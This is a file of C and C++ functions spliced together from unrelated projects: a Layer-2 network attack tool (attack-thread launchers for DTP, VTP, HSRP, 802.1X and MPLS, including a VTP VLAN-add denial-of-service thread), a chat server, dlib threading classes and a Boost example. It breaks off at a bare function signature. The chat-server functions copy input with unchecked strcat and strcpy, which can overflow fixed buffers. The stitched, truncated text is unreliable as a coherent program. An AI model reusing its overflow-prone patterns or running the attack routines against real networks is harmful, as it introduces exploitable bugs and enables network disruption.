/*
 * We arrived here due to normal termination
 * from thread tty peer main routine...
 * Release resources and delete acquired terminal...
 *
 * term_node may be NULL, in which case only the log message / state
 * update / pthread_exit() happen. Never returns.
 */
void th_tty_peer_exit(struct term_node *term_node)
{
    dlist_t *p;
    struct interface_data *iface_data;

    if (term_node)
    {
        /* Disable every network interface this terminal had enabled. */
        for (p = term_node->used_ints->list; p; p = dlist_next(term_node->used_ints->list, p))
        {
            iface_data = (struct interface_data *) dlist_data(p);
            interfaces_disable(iface_data->ifname);
        }

        /* Stop all attack threads owned by this terminal before freeing it. */
        attack_kill_th(term_node,ALL_ATTACK_THREADS);

        /* The terminal list is shared; delete the node under its mutex. */
        if (pthread_mutex_lock(&terms->mutex) != 0)
            thread_error("th_tty_peer pthread_mutex_lock",errno);

        term_delete_node(term_node, NOKILL_THREAD);

        if (pthread_mutex_unlock(&terms->mutex) != 0)
            thread_error("th_tty_peer pthread_mutex_unlock",errno);
    }

    write_log(0,"\n th_tty_peer %d finished...\n",(int)pthread_self());

    /* Mark the tty-peer subsystem as stopped and terminate this thread. */
    terms->work_state = STOPPED;

    pthread_exit(NULL);
}
/*
 * Allocate the runtime buffers for every attack parameter: a 'value'
 * buffer for each one and, when the node is a console terminal, a
 * 'print' buffer as well (one extra byte for the terminating NUL).
 * On any allocation failure every buffer obtained so far is released.
 * Returns 0 on success, -1 on allocation failure.
 */
int8_t attack_init_params(struct term_node *node, struct attack_param *param, u_int8_t nparams)
{
    u_int8_t idx, pidx, k;

    for (idx = 0; idx < nparams; idx++)
    {
        param[idx].value = calloc(1, param[idx].size);
        if (param[idx].value == NULL)
        {
            thread_error("attack_init_parameter calloc",errno);
            /* Roll back the value buffers already obtained. */
            for (k = 0; k < idx; k++)
                free(param[k].value);
            return -1;
        }
    }

    if (node->type == TERM_CON)
    {
        for (pidx = 0; pidx < nparams; pidx++)
        {
            param[pidx].print = calloc(1, param[pidx].size_print + 1);
            if (param[pidx].print == NULL)
            {
                thread_error("attack_init_parameter calloc",errno);
                /* Roll back everything: print buffers so far, then all values. */
                for (k = 0; k < pidx; k++)
                    free(param[k].print);
                for (k = 0; k < idx; k++)
                    free(param[k].value);
                return -1;
            }
        }
    }

    return 0;
}
/*
 * Register a newly accepted connection in the global clients[] table.
 * If the table is full, notify the client and block on max_condition
 * until another handler signals a free slot. Runs under client_mutex.
 */
void addclient(int socket)
{
    int i, n;

    pthread_mutex_lock(&client_mutex);
    threadcount++;

    if (threadcount > MAX_CLIENT_COUNT)
    {
        /* Tell the client the server is full before waiting for a slot. */
        n = write(socket, SERVER_FULL, SERVER_FULL_LEN);
        if (n < 0)
        {
            /* NOTE(review): if thread_error() ever returns instead of
             * terminating the thread, execution continues and client_mutex
             * is unlocked a second time at the bottom — confirm
             * thread_error()'s semantics. */
            pthread_mutex_unlock(&client_mutex);
            thread_error(socket, "ERROR in write");
        }
        printf("Waiting for other client handler threads to finish\n");
        /* Atomically releases client_mutex while waiting and re-acquires
         * it before returning. */
        pthread_cond_wait(&max_condition, &client_mutex);
        printf("Waiting for other threads done\n");
    }

    /* Claim the first free slot in the table. */
    for (i = 0; i < MAX_CLIENT_COUNT; ++i)
    {
        if (clients[i].initialized == 0)
        {
            clients[i].initialized = 1;
            clients[i].sockfd = socket;
            clients[i].user = NULL;
            break;
        }
    }
    printf("add client: client count %d\n", threadcount);
    pthread_mutex_unlock(&client_mutex);
}
/*
 * DTP sender attack thread: takes the 'finished' mutex, detaches itself,
 * caches the configured domain length, blocks every signal and transmits
 * the DTP packet, then terminates through the common exit routine.
 */
void dtp_th_send( void *arg )
{
    struct attacks *attacks = (struct attacks *)arg;
    struct dtp_data *dtp;
    sigset_t blocked;

    pthread_mutex_lock(&attacks->attack_th.finished);
    pthread_detach(pthread_self());

    dtp = attacks->data;
    dtp->dom_len = strlen(dtp->domain);

    sigfillset(&blocked);
    if (pthread_sigmask(SIG_BLOCK, &blocked, NULL))
    {
        thread_error("dtp_th_send pthread_sigmask()",errno);
        dtp_th_send_exit(attacks);
    }

    dtp_send(attacks);

    dtp_th_send_exit(attacks);
}
/* * Inicializa la estructura que se usa para relacionar el tmp_data * de cada nodo con los datos que se sacaran por pantalla cuando * se accede al demonio de red. * Teoricamente esta funcion solo se llama desde term_add_node() * la cual, a su vez, solo es llamada al tener el mutex bloqueado por * lo que no veo necesario que sea reentrante. (Fredy). */ int8_t dtp_init_comms_struct(struct term_node *node) { struct dtp_data *dtp_data; void **comm_param; comm_param = (void *)calloc(1,sizeof(void *)*SIZE_ARRAY(dtp_comm_params)); if (comm_param == NULL) { thread_error("dtp_init_commands_struct calloc error",errno); return -1; } dtp_data = node->protocol[PROTO_DTP].tmp_data; node->protocol[PROTO_DTP].commands_param = comm_param; comm_param[DTP_SMAC] = &dtp_data->mac_source; comm_param[DTP_DMAC] = &dtp_data->mac_dest; comm_param[DTP_VERSION] = &dtp_data->version; comm_param[DTP_NEIGH] = &dtp_data->neighbor; comm_param[DTP_STATUS] = &dtp_data->status; comm_param[DTP_TYPE] = &dtp_data->type; comm_param[DTP_DOMAIN] = &dtp_data->domain; comm_param[7] = NULL; comm_param[8] = NULL; return 0; }
/*
 * Attach (or replace) the nickname of the client registered on 'socket'.
 * The nick is copied into freshly allocated memory owned by the clients[]
 * entry; any previous nick is freed first. Runs under client_mutex.
 */
void addusernick(int socket, const char* nick)
{
    int i;

    pthread_mutex_lock(&client_mutex);
    for (i = 0; i < MAX_CLIENT_COUNT; ++i)
    {
        if (clients[i].initialized == 1 && clients[i].sockfd == socket)
        {
            if (clients[i].user != NULL)
                free(clients[i].user);
            /* BUG FIX: the original allocated strlen(nick) bytes, which
             * leaves no room for the terminating NUL that strcpy() writes
             * — a one-byte heap overflow. Allocate strlen(nick)+1. */
            clients[i].user = malloc(strlen(nick) + 1);
            if (clients[i].user == NULL)
            {
                pthread_mutex_unlock(&client_mutex);
                thread_error(socket, "Out of memory");
            }
            printf("Add user %s\n", nick);
            strcpy(clients[i].user, nick);
            break;
        }
    }
    pthread_mutex_unlock(&client_mutex);
}
/*
 * Callback for the attacks dialog launch button. Attacks that take
 * parameters get a copy of their parameter template plus initialized
 * buffers and a parameters dialog; parameterless attacks are launched
 * immediately. The attacks dialog is destroyed on the way out.
 */
void gtk_c_attacks_launch(GtkWidget *button, gpointer userdata)
{
    struct gtk_s_helper *helper = (struct gtk_s_helper *)userdata;
    GtkWidget *attacksdialog = lookup_widget(GTK_WIDGET(button), "attacksdialog");
    GtkWidget *paramsdialog;
    size_t params_sz;

    if (helper->attack && helper->attack->nparams)
    {
        params_sz = sizeof(struct attack_param) * helper->attack->nparams;
        helper->attack_param = calloc(1, params_sz);
        if (helper->attack_param == NULL)
        {
            thread_error(" ncurses_i_attack_screen attack_param calloc",errno);
            return;
        }
        /* Work on a private copy of the attack's parameter template. */
        memcpy(helper->attack_param, (void *)(helper->attack->param), params_sz);
        if (attack_init_params(helper->node, helper->attack_param, helper->attack->nparams) < 0)
        {
            free(helper->attack_param);
            return;
        }
        paramsdialog = gtk_i_create_attackparamsdialog(helper, helper->attack_param, helper->attack->nparams);
        gtk_widget_show(paramsdialog);
    }
    else if (attack_launch(helper->node, helper->mode, helper->row, NULL, 0) < 0)
        write_log(0, "Error launching attack %d", helper->row);

    gtk_widget_destroy(attacksdialog);
}
/* * Inicializa la estructura que se usa para relacionar el tmp_data * de cada nodo con los datos que se sacaran por pantalla cuando * se accede al demonio de red. * Teoricamente como esta funcion solo se llama desde term_add_node() * la cual, a su vez, solo es llamada al tener el mutex bloqueado por * lo que no veo necesario que sea reentrante. (Fredy). */ int8_t dot1x_init_comms_struct(struct term_node *node) { struct dot1x_data *dot1x_data; void **comm_param; comm_param = (void *)calloc(1,sizeof(void *)*SIZE_ARRAY(dot1x_comm_params)); if (comm_param == NULL) { thread_error("dot1x_init_commands_struct calloc error",errno); return -1; } dot1x_data = node->protocol[PROTO_DOT1X].tmp_data; node->protocol[PROTO_DOT1X].commands_param = comm_param; comm_param[DOT1X_SMAC] = &dot1x_data->mac_source; comm_param[DOT1X_DMAC] = &dot1x_data->mac_dest; comm_param[DOT1X_VER] = &dot1x_data->version; comm_param[DOT1X_TYPE] = &dot1x_data->type; comm_param[DOT1X_EAP_CODE] = &dot1x_data->eap_code; comm_param[DOT1X_EAP_ID] = &dot1x_data->eap_id; comm_param[DOT1X_EAP_TYPE] = &dot1x_data->eap_type; comm_param[DOT1X_EAP_INFO] = &dot1x_data->eap_info; comm_param[8] = NULL; comm_param[9] = NULL; return 0; }
void hsrp_th_send_raw( void *arg ) { struct attacks *attacks = (struct attacks *)arg; struct hsrp_data *hsrp_data; sigset_t mask; u_int32_t lbl32; pthread_mutex_lock(&attacks->attack_th.finished); pthread_detach(pthread_self()); sigfillset(&mask); if (pthread_sigmask(SIG_BLOCK, &mask, NULL)) { thread_error("hsrp_send_discover pthread_sigmask()",errno); hsrp_th_send_raw_exit(attacks); } hsrp_data = attacks->data; /* libnet fix */ lbl32 = htonl(hsrp_data->sip); memcpy((void *)&hsrp_data->sip, &lbl32, 4); lbl32 = htonl(hsrp_data->dip); memcpy((void *)&hsrp_data->dip, &lbl32, 4); hsrp_send_packet(attacks); hsrp_th_send_raw_exit(attacks); }
void vtp_th_send(void *arg) { struct attacks *attacks=NULL; struct vtp_data *vtp_data; sigset_t mask; attacks = arg; pthread_mutex_lock(&attacks->attack_th.finished); pthread_detach(pthread_self()); vtp_data = attacks->data; vtp_data->dom_len = strlen(vtp_data->domain); write_log(0,"\n\nvtp_th_send domain=%s dom_len=%d\n\n",vtp_data->domain,vtp_data->dom_len); sigfillset(&mask); if (pthread_sigmask(SIG_BLOCK, &mask, NULL)) { thread_error("vtp_th_send pthread_sigmask()",errno); vtp_th_send_exit(attacks); } vtp_send(attacks); vtp_th_send_exit(attacks); }
// Restart the managed thread. If no thread is alive, spawn one now; if
// one is still running, flag it to respawn itself when it finishes.
// Must NOT be called from the managed thread itself (asserted below).
// Throws thread_error if a new thread cannot be created.
void threaded_object::
restart (
)
{
    auto_mutex M(m_);
    DLIB_ASSERT(id1 != get_thread_id() || id_valid == false,
        "\tvoid threaded_object::restart()"
        << "\n\tYou can NOT call this function from the thread that executes threaded_object::thread"
        << "\n\tthis: " << this
        );
    if (is_alive_ == false)
    {
        // No thread running: create one immediately.  On failure we are
        // left not running and report via exception.
        if (create_new_thread<threaded_object,&threaded_object::thread_helper>(*this) == false)
        {
            is_running_ = false;
            throw thread_error();
        }
        should_respawn_ = false;
    }
    else
    {
        // A thread is still alive: ask it to run again after the current
        // pass completes rather than spawning a second one.
        should_respawn_ = true;
    }
    // Mark the object alive and running, clear any pending stop request,
    // and wake any waiters blocked on the state signaler.
    is_alive_ = true;
    is_running_ = true;
    should_stop_ = false;
    s.broadcast();
}
// Functor entry point: every message whose number is a multiple of five
// is converted into a thread_error (wrapped for current-exception
// capture and tagged with extra info); all others are simply logged.
void Message::operator()()
{
    if (num % 5 != 0)
    {
        Logger::log(info, str());
        return;
    }
    throw boost::enable_current_exception(thread_error()) << thread_info("Whazzup?");
}
/* * Finish the log file. */ void finish_log(void) { time_t this_time; this_time = time(NULL); write_log(0,"# %s finished on %s\n",PACKAGE, ctime(&this_time)); fflush(tty_tmp->log_file); if (fclose(tty_tmp->log_file) < 0) thread_error("Error in fclose", errno); }
/*
 * Generate the MD5 hash for a VTP Summary-Advert packet
 *
 * Layout of the hashed buffer: [16-byte secret digest][summary advert]
 * [vlan data][16-byte secret digest]. Both digest slots stay zeroed
 * when no secret is supplied. The resulting 16-byte hash is written
 * to 'md5'. Returns 0 on success, -1 on allocation failure.
 */
int8_t vtp_generate_md5(char *secret, u_int32_t updater, u_int32_t revision,
                        char *domain, u_int8_t dom_len, u_int8_t *vlans,
                        u_int16_t vlans_len, u_int8_t *md5, u_int8_t version)
{
    u_int8_t *data, md5_secret[16];
    struct vtp_summary *vtp_summ;

    /* Space for the data (MD5+SUMM_ADVERT+VLANS+MD5)...*/
    if ( (data = calloc(1, (16+sizeof(struct vtp_summary)+vlans_len+16))) == NULL)
    {
        thread_error("vtp_generate_md5 calloc()",errno);
        return -1;
    }

    /* Do MD5 secret...*/
    /* NOTE(review): this hashes the still-zeroed 'data' buffer for
     * strlen(secret) bytes rather than the secret itself; hashing
     * 'secret' looks like the intent — verify against the VTP MD5
     * reference before changing. */
    if (secret)
        md5_sum(data, strlen(secret), md5_secret);

    /* The summary advert starts right after the leading digest slot. */
    vtp_summ = (struct vtp_summary *)(data+16);

    write_log(0,"Se calcula MD5 con version=%d\n",version);

    vtp_summ->version = version;
    vtp_summ->code = 0x01;

    /* Clamp the domain name to the protocol maximum. */
    if (dom_len > VTP_DOMAIN_SIZE)
    {
        vtp_summ->dom_len = VTP_DOMAIN_SIZE;
        memcpy(vtp_summ->domain,domain,VTP_DOMAIN_SIZE);
    }
    else
    {
        vtp_summ->dom_len = dom_len;
        memcpy(vtp_summ->domain,domain,dom_len);
    }

    vtp_summ->updater = htonl(updater);
    vtp_summ->revision = htonl(revision);

    /* VLAN data, if any, follows the summary advert. */
    if (vlans_len)
        memcpy((void *)(vtp_summ+1),vlans,vlans_len);

    /* Trailing copy of the secret digest... */
    if (secret)
        memcpy((void *)(data+16+sizeof(struct vtp_summary)+vlans_len),md5_secret,16);

    /* ...then hash everything from the leading digest slot through the
     * trailing one (16 + payload + 16 = 32 + payload bytes). */
    md5_sum(data, (32+sizeof(struct vtp_summary)+vlans_len), md5);

    free(data);

    return 0;
}
void sendmessagefrom(int socket, const char* message) { int i, n; char buffer[512]; if (message == NULL) { printf("send message NULL!\n"); return; } pthread_mutex_lock(&client_mutex); for (i = 0; i < MAX_CLIENT_COUNT; ++i) { if (clients[i].initialized == 1 && clients[i].sockfd == socket) { memset(buffer, 0, 512); strcat(buffer, "["); if (clients[i].user != NULL) strcat(buffer, clients[i].user); strcat(buffer, "]"); strcat(buffer, message); } } if (strlen(buffer) > 0) { for (i = 0; i < MAX_CLIENT_COUNT; ++i) { if (clients[i].initialized == 1 && clients[i].sockfd != socket) { n = write(clients[i].sockfd, buffer, strlen(buffer)); if (n < 0) { pthread_mutex_unlock(&client_mutex); thread_error(clients[i].sockfd, "ERROR writing to socket"); } } } } pthread_mutex_unlock(&client_mutex); }
/*
 * 802.1X sender attack thread: takes the 'finished' mutex, detaches
 * itself, blocks every signal and transmits the 802.1X packet, then
 * terminates through the common exit routine.
 */
void dot1x_th_send( void *arg )
{
    struct attacks *attacks = (struct attacks *)arg;
    sigset_t blocked;

    pthread_mutex_lock(&attacks->attack_th.finished);
    pthread_detach(pthread_self());

    sigfillset(&blocked);
    if (pthread_sigmask(SIG_BLOCK, &blocked, NULL))
    {
        thread_error("dot1x_th_send pthread_sigmask()",errno);
        dot1x_th_send_exit(attacks);
    }

    dot1x_send(attacks);

    dot1x_th_send_exit(attacks);
}
// Start (or restart) every registered thread that is not currently
// running: one new thread is spawned for each registered-but-dead slot.
// On spawn failure the object is flagged stopped/not-running and a
// thread_error is thrown. Waiters on the state signaler are woken.
void multithreaded_object::
start (
)
{
    auto_mutex M(m);

    // Total threads this object should be running: already-finished ones
    // plus those currently alive.
    const unsigned long num_threads_registered = dead_threads.size() + thread_ids.size();
    // start any dead threads
    for (unsigned long i = threads_started; i < num_threads_registered; ++i)
    {
        if (create_new_thread<multithreaded_object,&multithreaded_object::thread_helper>(*this) == false)
        {
            should_stop_ = true;
            is_running_ = false;
            throw thread_error();
        }
        ++threads_started;
    }

    is_running_ = true;
    should_stop_ = false;
    s.broadcast();
}
/* * Inicializa la estructura que se usa para relacionar el tmp_data * de cada nodo con los datos que se sacaran por pantalla cuando * se accede al demonio de red. * Teoricamente como esta funcion solo se llama desde term_add_node() * la cual, a su vez, solo es llamada al tener el mutex bloqueado por * lo que no veo necesario que sea reentrante. (Fredy). */ int8_t hsrp_init_comms_struct(struct term_node *node) { struct hsrp_data *hsrp_data; void **comm_param; comm_param = (void *)calloc(1,sizeof(void *)*SIZE_ARRAY(hsrp_comm_params)); if (comm_param == NULL) { thread_error("hsrp_init_commands_struct calloc error",errno); return -1; } hsrp_data = node->protocol[PROTO_HSRP].tmp_data; node->protocol[PROTO_HSRP].commands_param = comm_param; comm_param[HSRP_SMAC] = &hsrp_data->mac_source; comm_param[HSRP_DMAC] = &hsrp_data->mac_dest; comm_param[HSRP_SIP] = &hsrp_data->sip; comm_param[HSRP_DIP] = &hsrp_data->dip; comm_param[HSRP_SPORT] = &hsrp_data->sport; comm_param[HSRP_DPORT] = &hsrp_data->dport; comm_param[HSRP_VER] = &hsrp_data->version; comm_param[HSRP_OPCODE] = &hsrp_data->opcode; comm_param[HSRP_STATE] = &hsrp_data->state; comm_param[HSRP_HELLO_TIME] = &hsrp_data->hello_time; comm_param[HSRP_HOLD_TIME] = &hsrp_data->hold_time; comm_param[HSRP_PRIORITY] = &hsrp_data->priority; comm_param[HSRP_GROUP] = &hsrp_data->group; comm_param[HSRP_RESERVED] = &hsrp_data->reserved; comm_param[HSRP_AUTHDATA] = &hsrp_data->authdata; comm_param[HSRP_VIRTUALIP] = &hsrp_data->virtual_ip; comm_param[16] = NULL; comm_param[17] = NULL; return 0; }
int8_t mpls_init_comms_struct(struct term_node *node) { struct mpls_data *mpls_data; void **comm_param; comm_param = (void *)calloc(1,sizeof(void *)*SIZE_ARRAY(mpls_comm_params)); if (comm_param == NULL) { thread_error("mpls_init_comms_struct calloc error",errno); return -1; } mpls_data = node->protocol[PROTO_MPLS].tmp_data; node->protocol[PROTO_MPLS].commands_param = comm_param; comm_param[MPLS_SMAC] = &mpls_data->mac_source; comm_param[MPLS_DMAC] = &mpls_data->mac_dest; comm_param[MPLS_LABEL1] = &mpls_data->label1; comm_param[MPLS_EXP1] = &mpls_data->exp1; comm_param[MPLS_BOTTOM1] = &mpls_data->bottom1; comm_param[MPLS_TTL1] = &mpls_data->ttl1; comm_param[MPLS_LABEL2] = &mpls_data->label2; comm_param[MPLS_EXP2] = &mpls_data->exp2; comm_param[MPLS_BOTTOM2] = &mpls_data->bottom2; comm_param[MPLS_TTL2] = &mpls_data->ttl2; comm_param[MPLS_SRC_IP] = &mpls_data->src_ip; comm_param[MPLS_SRC_PORT] = &mpls_data->src_port; comm_param[MPLS_DST_IP] = &mpls_data->dst_ip; comm_param[MPLS_DST_PORT] = &mpls_data->dst_port; comm_param[MPLS_PAYLOAD] = &mpls_data->ip_payload; comm_param[15] = NULL; comm_param[16] = NULL; return 0; }
/* * Inicializa la estructura que se usa para relacionar el tmp_data * de cada nodo con los datos que se sacaran por pantalla cuando * se accede al demonio de red. * Teoricamente como esta funcion solo se llama desde term_add_node() * la cual, a su vez, solo es llamada al tener el mutex bloqueado por * lo que no veo necesario que sea reentrante. (Fredy). */ int8_t vtp_init_comms_struct(struct term_node *node) { struct vtp_data *vtp_data; void **comm_param; comm_param = (void *)calloc(1,sizeof(void *)*SIZE_ARRAY(vtp_comm_params)); if (comm_param == NULL) { thread_error("vtp_init_commands_struct calloc error",errno); return -1; } vtp_data = node->protocol[PROTO_VTP].tmp_data; node->protocol[PROTO_VTP].commands_param = comm_param; comm_param[VTP_SMAC] = &vtp_data->mac_source; comm_param[VTP_DMAC] = &vtp_data->mac_dest; comm_param[VTP_VERSION] = &vtp_data->version; comm_param[VTP_CODE] = &vtp_data->code; comm_param[VTP_DOMAIN] = &vtp_data->domain; comm_param[VTP_MD5] = &vtp_data->md5; comm_param[VTP_UPDATER] = &vtp_data->updater; comm_param[VTP_REVISION] = &vtp_data->revision; comm_param[VTP_TIMESTAMP] = &vtp_data->timestamp; comm_param[VTP_STARTVAL] = &vtp_data->start_val; comm_param[VTP_FOLLOWERS] = &vtp_data->followers; comm_param[VTP_SEQ] = &vtp_data->seq; comm_param[12] = NULL; comm_param[13] = NULL; comm_param[VTP_VLAN] = &vtp_data->options; return 0; }
/*
 * Add 1 VTP vlan
 *
 * DoS attack thread: takes the 'finished' mutex, detaches itself,
 * blocks every signal and sends a VTP VLAN-add update, then terminates
 * through the common exit routine.
 */
void vtp_th_dos_add(void *arg)
{
    struct attacks *attacks=NULL;
    sigset_t mask;

    attacks = arg;

    pthread_mutex_lock(&attacks->attack_th.finished);
    pthread_detach(pthread_self());

    sigfillset(&mask);
    if (pthread_sigmask(SIG_BLOCK, &mask, NULL))
    {
        /* BUG FIX: the diagnostic named vtp_th_dos_del (copy-paste from
         * the delete attack); report the correct function. */
        thread_error("vtp_th_dos_add pthread_sigmask()",errno);
        vtp_th_dos_add_exit(attacks);
    }

    vtp_modify_vlan(VTP_VLAN_ADD,attacks);

    vtp_th_dos_add_exit(attacks);
}
/* Launch the chosen attack: claim the first free attack slot for the
 * protocol, give it a private copy of the interface list and of the
 * protocol scratch data, initialize its mutexes and spawn the attack
 * thread. Returns 0 on success, -1 when no slot is free or on any
 * allocation / thread-creation failure. */
int8_t attack_launch(struct term_node *node, u_int16_t proto, u_int16_t attack,
                     struct attack_param *attack_params, u_int8_t nparams)
{
    u_int16_t i = 0;
    dlist_t *p;
    void *value1, *value2;

    while (i < MAX_THREAD_ATTACK)
    {
        if (node->protocol[proto].attacks[i].up == 0)
        {
            /* Claim the slot and record the attack configuration. */
            node->protocol[proto].attacks[i].up = 1;
            node->protocol[proto].attacks[i].mac_spoofing = node->mac_spoofing;
            node->protocol[proto].attacks[i].attack = attack;
            node->protocol[proto].attacks[i].params = attack_params;
            node->protocol[proto].attacks[i].nparams = nparams;
            /* FIXME: temporary until this is done properly — the attack
             * borrows (a deep copy of) the user's interface list. */
            /* NOTE(review): neither this calloc nor the per-element one
             * below is NULL-checked before use. */
            node->protocol[proto].attacks[i].used_ints = (list_t *) calloc(1, sizeof(list_t));
            for (p = node->used_ints->list; p; p = dlist_next(node->used_ints->list, p))
            {
                value1 = dlist_data(p);
                value2 = (void *) calloc(1, sizeof(struct interface_data));
                memcpy((void *)value2, (void *)value1, sizeof(struct interface_data));
                node->protocol[proto].attacks[i].used_ints->list =
                    dlist_append(node->protocol[proto].attacks[i].used_ints->list, value2);
            }
            node->protocol[proto].attacks[i].used_ints->cmp = interfaces_compare;

            /* Private copy of the protocol scratch data for this attack.
             * NOTE(review): the interface list copied above is leaked on
             * this and the following error paths. */
            if ((node->protocol[proto].attacks[i].data = calloc(1, protocols[proto].size )) == NULL)
            {
                thread_error("attack_launch calloc",errno);
                node->protocol[proto].attacks[i].params = NULL;
                node->protocol[proto].attacks[i].nparams = 0;
                node->protocol[proto].attacks[i].up = 0;
                return -1;
            }
            memcpy(node->protocol[proto].attacks[i].data,
                   node->protocol[proto].tmp_data, protocols[proto].size );

            /* NOTE(review): the two mutex-init failure paths below leave
             * the slot marked up=1 and params/nparams set — confirm
             * whether that is intentional. */
            if (pthread_mutex_init(&node->protocol[proto].attacks[i].attack_th.finished, NULL) != 0)
            {
                thread_error("attack_launch pthread_mutex_init mutex", errno);
                free(node->protocol[proto].attacks[i].data);
                return -1;
            }
            if (pthread_mutex_init(&node->protocol[proto].attacks[i].helper_th.finished, NULL) != 0)
            {
                thread_error("attack_launch pthread_mutex_init mutex", errno);
                free(node->protocol[proto].attacks[i].data);
                return -1;
            }

            /* Spawn the protocol's attack thread for this slot. */
            if
            (thread_create(&node->protocol[proto].attacks[i].attack_th.id,
                           (*protocols[proto].attacks[attack].attack_th_launch),
                           &node->protocol[proto].attacks[i]) < 0)
            {
                free(node->protocol[proto].attacks[i].data);
                node->protocol[proto].attacks[i].params = NULL;
                node->protocol[proto].attacks[i].nparams = 0;
                node->protocol[proto].attacks[i].up = 0;
                return -1;
            }

            write_log(0, " attack_launch: %d Attack thread %ld is born!!\n",
                      (int)pthread_self(),
                      (u_long) node->protocol[proto].attacks[i].attack_th.id);

            return 0;
        }
        i++;
    } /* while...*/

    /* No free attack slot available. */
    return -1;
}
void* handle_client(void* fd) { int n; int oldtype; int clientfd; int nickLen; char buffer[256]; char *token; char usernick[256]; clientfd = (*(int*)fd); nickLen = 0; n = pthread_setcanceltype(PTHREAD_CANCEL_DEFERRED, &oldtype); if (n < 0) thread_error(clientfd, "ERROR in setcanceltype"); addclientthread(clientfd, (pthread_t*)pthread_self()); sendusercount(clientfd); while (1) { printf("handle client %d\n", clientfd); memset(buffer, 0, 256); n = read(clientfd, buffer, 255); if (n <= 0) { thread_error(clientfd, "Client disconnected"); } if (nickLen == 0) { token = strtok(buffer, " "); if (token == NULL) thread_error(clientfd, "ERROR client protocol"); if (strcmp(token, USER) == 0) { token = strtok(NULL, " "); if (token == NULL) thread_error(clientfd, "ERROR reading client message"); nickLen = strlen(token); if (nickLen > 0 && nickLen <= 256) { strcpy(usernick, (const char*)token); addusernick(clientfd, (const char*)&usernick); } else { n = write(clientfd, ERROR, ERROR_LEN); } if (n < 0) { thread_error(clientfd, "ERROR writing to socket"); } } } else { sendmessagefrom(clientfd, buffer); } } removeclient(clientfd); pthread_exit(NULL); }
/*
 * Command-line main loop for a single attack: launch the attack selected
 * on the tty terminal, switch stdin to raw (non-canonical, no-echo) mode,
 * then either wait for a keypress to stop a continuous attack or wait for
 * a one-shot attack to finish. The original terminal settings are
 * restored before returning. (Original note: "David, pon algo coherente!!!")
 */
void doloop(struct term_node *node, int mode)
{
    struct term_tty *term_tty;
    struct attack *theattack = NULL;
    struct timeval timeout;
    fd_set read_set;
    int ret, fail;
    struct termios old_term, term;

    term_tty = node->specific;
    theattack = protocols[mode].attacks;

    if (term_tty->attack >= 0)
    {
        if (theattack[term_tty->attack].nparams)
        {
            /* Parameterized attacks are not supported from the CLI. */
            printf("\n<*> Ouch!! At the moment the command line interface doesn't support attacks <*>\n");
            printf("<*> that needs parameters and the one you've choosed needs %d <*>\n",
                   theattack[term_tty->attack].nparams);
        }
        else
        {
            printf("<*> Starting %s attack %s...\n",
                   (theattack[term_tty->attack].type)?"DOS":"NONDOS",
                   theattack[term_tty->attack].s);

            if (attack_launch(node, mode, term_tty->attack, NULL, 0) < 0)
                write_log(1, "Error launching attack %d (mode %d)!!\n", term_tty->attack, mode);

            /* Put stdin into raw mode: unbuffered, byte-at-a-time, no echo,
             * saving the old settings for restoration below. */
            fflush(stdin);
            fflush(stdout);
            setvbuf(stdout, NULL, _IONBF, 0);
            tcgetattr(0,&old_term);
            tcgetattr(0,&term);
            term.c_cc[VMIN] = 1;
            term.c_cc[VTIME] = _POSIX_VDISABLE;
            term.c_lflag &= ~ICANON;
            term.c_lflag &= ~ECHO;
            tcsetattr(0,TCSANOW,&term);

            if (theattack[term_tty->attack].single == CONTINOUS)
            {
                printf("<*> Press any key to stop the attack <*>\n");
                fail = 0;
                /* Poll stdin every 200 ms until a key arrives or the
                 * terminal is asked to stop. */
                while(!fail && !node->thread.stop)
                {
                    FD_ZERO(&read_set);
                    FD_SET(0, &read_set);
                    timeout.tv_sec = 0;
                    timeout.tv_usec = 200000;
                    if ( (ret=select(1, &read_set, NULL, NULL, &timeout) ) == -1 )
                    {
                        thread_error("network_peer_th select()",errno);
                        continue;
                    }
                    if ( !ret ) /* Timeout, decrement timers... */
                        continue;
                    else
                    {
                        if (FD_ISSET(0, &read_set))
                        {
                            /* Consume the keypress and leave the loop. */
                            getchar();
                            fail = 1;
                        }
                    }
                }
            }
            else
                /* Command line, only one attack (0), let's wait for its conclusion... */
                while (node->protocol[mode].attacks[0].up)
                    thread_usleep(150000);

            /* Restore the terminal to its original settings. */
            tcsetattr(0,TCSANOW, &old_term);
        }
    } /* if term_tty->attack */
}
/*
 * Uptime thread: increments the global 'uptime' counter once per second
 * using a 1-second select() as the timer. Blocks all signals, registers
 * th_uptime_clean as its cancellation cleanup handler and enables
 * asynchronous cancellation so it can be killed at any point.
 */
void * th_uptime(void *arg)
{
    int ret,n;
    struct timeval timeout;
    sigset_t mask;

    write_log(0,"\n th_uptime thread = %d\n",(int)pthread_self());

    /* Block every signal; other threads handle them. */
    sigfillset(&mask);
    if (pthread_sigmask(SIG_BLOCK, &mask, NULL))
    {
        thread_error("th_uptime pthread_sigmask()",errno);
        th_uptime_exit();
    }

    /* Disable cancellation while the cleanup handler is registered... */
    if (pthread_setcancelstate(PTHREAD_CANCEL_DISABLE, NULL))
    {
        thread_error("th_uptime pthread_setcancelstate()",errno);
        th_uptime_exit();
    }

    /* pthread_cleanup_push/pop are macros that must stay lexically
     * paired in this function — do not restructure. */
    pthread_cleanup_push( &th_uptime_clean, (void *)NULL );

    /* ...then re-enable it now that cleanup is in place. */
    if (pthread_setcancelstate(PTHREAD_CANCEL_ENABLE, NULL))
    {
        thread_error("th_uptime pthread_setcancelstate()",errno);
        th_uptime_exit();
    }

    if (pthread_setcanceltype(PTHREAD_CANCEL_ASYNCHRONOUS, NULL))
    {
        /* Save errno before the next pthread call can clobber it. */
        n=errno;
        pthread_setcancelstate(PTHREAD_CANCEL_DISABLE, NULL);
        thread_error("th_uptime pthread_setcanceltype()",n);
        th_uptime_exit();
    }

    /* 1-second tick loop; select() with no fds acts as the sleep. */
    while(1)
    {
        timeout.tv_sec = 1;
        timeout.tv_usec = 0;
        if ( (ret=select( 0, NULL, NULL, NULL, &timeout ) ) == -1 )
        {
            n=errno;
            thread_error("th_uptime select()",n);
            continue;
        }
        if ( !ret ) /* Timeout, update uptime... */
            uptime++;
    }

    /* Not reached (the loop above never exits); kept so the cleanup
     * macros remain paired. */
    pthread_setcancelstate(PTHREAD_CANCEL_DISABLE, NULL);
    pthread_cleanup_pop(0);

    return (NULL);
}
/*
 * Build a DTP frame (Cisco SNAP header + version, domain, status, type
 * and neighbor TLVs) and transmit it as 802.2/802.3 on every interface
 * used by the attack. Returns 0 on success, -1 on any allocation or
 * libnet failure. The payload buffer is calloc'd, so every byte skipped
 * by the aux++ pointer bumps below stays zero.
 */
int8_t dtp_send(struct attacks *attacks)
